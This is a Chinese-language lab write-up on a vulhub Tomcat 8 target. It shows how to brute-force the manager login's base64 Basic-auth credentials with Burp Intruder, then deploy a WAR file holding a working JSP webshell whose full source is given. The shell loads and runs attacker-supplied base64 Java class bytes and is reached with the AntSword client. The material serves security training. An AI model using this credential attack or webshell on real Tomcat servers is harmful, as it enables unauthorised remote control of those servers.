Tomcat弱口令上传war包

Tomcat弱口令上传war包

思路：

​ 利用弱口令登录管理页面 ---> 部署war包 ---> getshell

环境：

​ vulhub靶场：tomcat/tomcat8

​ 启动：sudo docker-compose up -d

tomcat弱口令：

​ 默认页面，访问manager

​

​ 随便输入用户名+密码，bp抓包，可以看到用户名+密码被base64加密放在了Authorization里

​ 这里的账户名解密出是admin/123456

​ 发送到inturder中，选择sniper(狙击手)，选中刚才的加密字段

​ 因为要用分成了3个地方，所以使用自定义迭代

​ 位置1添加用户名。

​

​ 位置2添加冒号

​

​ 位置3添加密码

​ 取消默认URL编码

​ 最后base64编码

​ 开始爆破，发现有一个状态码为200，长度也不同

​ base64解码得到弱口令：tomcat/tomcat

​ 成功进入后台

tomcat上传war包getshell：

​ 先生成jsp木马，文件名为cmd.jsp

# jsp木马,连接密码为cmd
<%!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz = Class.forName("sun.misc.BASE64Decoder");return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz = Class.forName("java.util.Base64");Object decoder = clazz.getMethod("getDecoder").invoke(null);return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);}}
%>
<%String cls = request.getParameter("cmd");if (cls != null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);}
%>

​ 在当前目录打开cmd，将cmd.jsp打包成war包

# 上面不行试一下下面的
jar –cvf cmd.war cmd.jsp
jar cvf cmd.war cmd.jsp

​ 得到cmd.war

​ 找到上传按钮上传cmd.war

​

​ 看到OK后访问路径：/cmd/cmd.jsp，（其他后门命名类似），看到白屏就是成功解析了

​ 中国蚁剑也是成功上线！（连接密码cmd）

总结：

​ 由于管理员使用弱口令，我们可以轻易用字典爆破出用户名和密码，登录后上传war包，使用蚁剑连接以控制部署tomcat的服务器

​ 技能get:

​ 自定义字典爆破，payload加工，制作war包

​